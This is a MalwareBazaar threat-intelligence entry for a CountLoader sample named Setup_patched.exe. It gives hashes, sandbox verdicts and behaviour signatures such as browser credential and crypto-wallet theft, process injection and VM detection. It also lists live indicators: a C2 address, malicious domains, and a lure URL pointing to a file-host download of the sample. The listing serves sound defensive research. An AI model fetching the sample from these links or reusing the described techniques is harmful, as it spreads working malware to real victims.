MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 041214997b5ba9f3b344f660d1ab8542b76473538ebc593f78abfd8cee72b7a5. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


CountLoader


Vendor detections: 12


Intelligence 12 IOCs YARA 1 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 041214997b5ba9f3b344f660d1ab8542b76473538ebc593f78abfd8cee72b7a5
SHA3-384 hash: e7613f0a9d1be32789982be6f21afc5fb3dd050b6e5ea4369056fb12d7b1af23413081017ae98373186bccd45e456dfd
SHA1 hash: 5c0a732f1ae17ba470e049689ddb63424aa5f6bf
MD5 hash: 30ce1e4b80da8ded9cdde1be65c2fbd3
humanhash: triple-tennis-oregon-connecticut
File name:Setup_patched.exe
Download: download sample
Signature CountLoader
Create hunting rule
File size:2'966'144 bytes
First seen:2026-03-01 12:22:19 UTC
Last seen:Never
File type:Executable exe
MIME type:application/x-dosexec
imphash 4cea7ae85c87ddc7295d39ff9cda31d1 (90 x LummaStealer, 85 x RedLineStealer, 62 x Rhadamanthys)
ssdeep 49152:ClRltyG45DARVitofpdJP+xxUkQH3M9DPf4CguAyHrpllQhvDW:ClE5MCmxd93MloClllQdy
TLSH T17DD52256ADDD54E6DCF443F1909332B20E353C3983BD09AF3598B0295BB2A91CA37B16
TrID 45.6% (.EXE) Microsoft Visual C++ compiled executable (generic) (16529/12/5)
18.0% (.EXE) Win64 Executable (generic) (6522/11/2)
13.9% (.EXE) Win16 NE executable (generic) (5038/12/1)
5.6% (.ICL) Windows Icons Library (generic) (2059/9)
5.6% (.EXE) OS/2 Executable (generic) (2029/13)
Magika pebin
Reporter aachum
Tags:194-76-226-162 37-221-66-27 AsgardProtector CountLoader de-pumped DeepLoad exe explorer-vg


Avatar
iamaachum
https://mlkkiooc.icu/ => https://mega.nz/file/AF8mFIQD#X_HEohVCw74ohDDz3YeLloIvwnKhkjuTuwaRhhgYE2M

C2: 194.76.226.162:7673

Intelligence

File Origin
# of uploads :
1
# of downloads :
116
Origin country :
ES ES
Vendor Threat Intelligence
Malware configuration found for:
Archives AutoIt
Details
Archives
an extracted Cabinet archive from the resources and SFX parameters
Link:
https://research.acce.ciphertechsolutions.com/results/18ec25c4-f50f-4f84-8e42-004e82af5527/
Malware family:
n/a
ID:
1
File name:
Setup_patched.exe
Verdict:
Malicious activity
Analysis date:
2026-03-01 12:24:24 UTC
Tags:
autoit rat
Link:
https://app.any.run/tasks/972831d5-c1ca-424b-85d3-118cc13b6267

Note:
ANY.RUN is an interactive sandbox that analyzes all user actions rather than an uploaded sample
Detection:
n/a
Link:
https://www.capesandbox.com/analysis/55089/
Verdict:
Malicious
Score:
99.9%
Link:
https://cyber-fortress.com/docs/result/index.php?id=69a42fb48fffa866e3b3bbbb
Tags:
autoit emotet
Verdict:
Suspicious
Threat level:
  5/10
Confidence:
100%
Tags:
adaptive-context at autoit CAB darkgate expand explorer installer installer installer-heuristic lolbin lolbin microsoft_visual_cc overlay packed rundll32 runonce sfx
Link:
https://www.filescan.io/uploads/69a42fb197feb4afd6628a06/reports/10e24cee-1341-436d-b407-8f75cc485170/overview
Verdict:
Malicious
Labled as:
Win/malicious_confidence_100%
Link:
https://www.hybrid-analysis.com/sample/041214997b5ba9f3b344f660d1ab8542b76473538ebc593f78abfd8cee72b7a5
Result
Gathering data
Verdict:
Malicious
File Type:
exe x64
Detections:
Trojan.Win32.Autoit.sb
Link:
https://opentip.kaspersky.com/041214997b5ba9f3b344f660d1ab8542b76473538ebc593f78abfd8cee72b7a5/results?tab=lookup
Verdict:
Suspicious
Link:
https://analyze.intezer.com/analyses/049b7675-3c4f-4b3b-8a42-c2e01bbe16b0
Result
Threat name:
n/a
Detection:
malicious
Classification:
troj.spyw.expl.evad
Score:
100 / 100
Link:
https://www.joesandbox.com/analysis/1876470
Signature
.NET source code contains potential unpacker
Antivirus detection for URL or domain
Bypasses PowerShell execution policy
Creates a thread in another existing process (thread injection)
Creates processes via WMI
Deletes itself after installation
Detected CypherIt Packer
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Powershell drops PE file
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Legitimate Application Dropped Archive
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Suricata IDS alerts for network traffic
Tries to access browser extension known for cryptocurrency wallets
Tries to harvest and steal browser information (history, passwords, etc)
Uses known network protocols on non-standard ports
Uses ping.exe to check the status of other devices and networks
Uses schtasks.exe or at.exe to add and modify task schedules
Writes or reads registry keys via WMI
Writes to foreign memory regions
Yara detected Powershell download and execute
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1876470 Sample: Setup_patched.exe Startdate: 01/03/2026 Architecture: WINDOWS Score: 100 100 laQKCmPhEzjtRovCAgJpvX.laQKCmPhEzjtRovCAgJpvX 2->100 102 forest-entity.cc 2->102 104 explorer.vg 2->104 130 Suricata IDS alerts for network traffic 2->130 132 Malicious sample detected (through community Yara rule) 2->132 134 Antivirus detection for URL or domain 2->134 136 10 other signatures 2->136 13 Setup_patched.exe 1 8 2->13         started        16 mshta.exe 2->16         started        18 mshta.exe 2->18         started        20 2 other processes 2->20 signatures3 process4 signatures5 156 Uses schtasks.exe or at.exe to add and modify task schedules 13->156 22 cmd.exe 1 13->22         started        25 at.exe 1 13->25         started        158 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 16->158 160 Bypasses PowerShell execution policy 16->160 162 Tries to access browser extension known for cryptocurrency wallets 16->162 164 2 other signatures 16->164 27 powershell.exe 18->27         started        31 WmiPrvSE.exe 18->31         started        process6 dnsIp7 138 Detected CypherIt Packer 22->138 33 cmd.exe 3 22->33         started        36 cmd.exe 1 22->36         started        38 conhost.exe 22->38         started        40 conhost.exe 25->40         started        114 forest-entity.cc 78.128.114.182 TAMATIYA-ASBG Bulgaria 27->114 98 C:\Users\user\Downloads\filemanager.exe, PE32+ 27->98 dropped 42 filemanager.exe 27->42         started        46 conhost.exe 27->46         started        file8 signatures9 process10 dnsIp11 92 C:\Users\user\AppData\Local\...\Cardiac.exe, PE32 33->92 dropped 48 Cardiac.exe 1 33->48         started        52 cmd.exe 1 33->52         started        54 cmd.exe 1 33->54         started        56 2 other processes 33->56 110 37.221.66.27 FIRSTDC-ASRU Russian Federation 42->110 140 Multi AV Scanner detection for dropped file 42->140 142 Tries to harvest and steal browser information (history, passwords, etc) 42->142 file12 signatures13 process14 file15 90 C:\Users\user\AppData\Local\...\RegAsm.exe, PE32 48->90 dropped 124 Deletes itself after installation 48->124 126 Writes to foreign memory regions 48->126 128 Injects a PE file into a foreign processes 48->128 58 RegAsm.exe 4 48->58         started        62 findstr.exe 1 52->62         started        signatures16 process17 dnsIp18 112 194.76.226.162, 49692, 7673 SERVINGADE Germany 58->112 144 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 58->144 146 Found many strings related to Crypto-Wallets (likely being stolen) 58->146 148 Tries to harvest and steal browser information (history, passwords, etc) 58->148 64 cmd.exe 1 58->64         started        67 powershell.exe 34 58->67         started        69 cmd.exe 58->69         started        71 chrome.exe 58->71         started        signatures19 process20 signatures21 116 Uses ping.exe to check the status of other devices and networks 64->116 73 mshta.exe 1 15 64->73         started        78 conhost.exe 64->78         started        118 Creates a thread in another existing process (thread injection) 67->118 120 Injects a PE file into a foreign processes 67->120 122 Powershell drops PE file 67->122 80 csc.exe 3 67->80         started        82 conhost.exe 67->82         started        84 PING.EXE 69->84         started        86 conhost.exe 69->86         started        process22 dnsIp23 106 explorer.vg 45.156.87.92 SKYLINKNL Germany 73->106 94 C:\Users\user\...\Project_London__29[1].rar, HTML 73->94 dropped 150 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 73->150 152 Tries to access browser extension known for cryptocurrency wallets 73->152 154 Writes or reads registry keys via WMI 73->154 96 C:\Users\user\AppData\Local\...\vbotxgqs.dll, PE32 80->96 dropped 88 cvtres.exe 1 80->88         started        108 1.0.0.1 CLOUDFLARENETUS Australia 84->108 file24 signatures25 process26
Score:
93%
Verdict:
Malware
File Type:
PE
Link:
https://malprob.io/report/041214997b5ba9f3b344f660d1ab8542b76473538ebc593f78abfd8cee72b7a5
Gathering data
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/041214997b5ba9f3b344f660d1ab8542b76473538ebc593f78abfd8cee72b7a5/
Verdict:
Malicious
Threat:
Trojan.Win32.Autoit
Link:
https://tip.neiki.dev/file/041214997b5ba9f3b344f660d1ab8542b76473538ebc593f78abfd8cee72b7a5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=aqjbjgl3lou7hm2e6zqndk4fik3wi42tr26fsp3yvp6yz3tsw6sq._file
Result
Malware family:
n/a
Score:
  7/10
Tags:
discovery persistence
Link:
https://tria.ge/reports/260301-pkkakagx6g/
Behaviour
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Program crash
System Location Discovery: System Language Discovery
Adds Run key to start application
Deletes itself
Executes dropped EXE
Unpacked files
SH256 hash:
041214997b5ba9f3b344f660d1ab8542b76473538ebc593f78abfd8cee72b7a5
MD5 hash:
30ce1e4b80da8ded9cdde1be65c2fbd3
SHA1 hash:
5c0a732f1ae17ba470e049689ddb63424aa5f6bf
Link:
https://www.unpac.me/results/704ca930-1b88-4ac3-b94b-aa2ddc2f3b34/
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/041214997b5ba9f3b344f660d1ab8542b76473538ebc593f78abfd8cee72b7a5

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:detect_Redline_Stealer
Create hunting rule
Author:Varp0s

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

CountLoader

zip d6c4d19e8ab26b20697bd35a5ec0efb227b318ee2cc3e03d9e5859d4e6564610

CountLoader

Executable exe 041214997b5ba9f3b344f660d1ab8542b76473538ebc593f78abfd8cee72b7a5

(this sample)

  
Link
https://tria.ge/260301-pb8lssfy7g/behavioral2
  
Dropped by
SHA256 d6c4d19e8ab26b20697bd35a5ec0efb227b318ee2cc3e03d9e5859d4e6564610
  
Delivery method
Distributed via web download
Cape
Cape
https://www.capesandbox.com/analysis/55089/
  
Dropped by
MD5 8367bffc76e67dbbe2d560da2c0b5bd5

Comments